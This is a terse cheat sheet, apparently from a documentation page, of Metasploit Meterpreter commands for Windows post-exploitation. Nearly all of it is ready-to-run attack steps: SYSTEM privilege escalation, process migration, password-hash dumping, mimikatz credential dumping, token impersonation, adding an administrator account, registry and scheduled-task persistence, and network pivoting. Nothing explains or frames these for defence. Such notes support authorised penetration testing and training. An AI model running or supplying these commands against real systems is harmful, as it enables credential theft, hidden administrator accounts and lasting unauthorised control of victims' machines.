windows meterpreter
shell access (cmd & powershell)
for cmd.exe
shell
for powershell
load powershell
>powershell_shell
windows specific commands
getuid
sysinfo
ipconfig
arp
route
getsystem
getprivs
migrate <system-process>
hashdump
post enumeration
run post/windows/gather/*
incognito | milkdevil/incognito2
load incognito
list_tokens [-u | -g]
impersonate_token "<token>"
# for better results
migrate <pid>
add_user <user> <pass>
add_localgroup Administrators <user>
mimikatz
load kiwi
creds_all
local exploit suggester
run post/multi/recon/local_exploit_suggester
Persistence
persistence -h
use exploit/windows/local/persistence
use exploit/windows/local/registry_persistence
run scheduleme
run schtaskabuse
autoroute
run autoroute -s IP/CIDR
run autoroute -p
[OR]
use post/multi/manage/autoroute
Last updated
Was this helpful?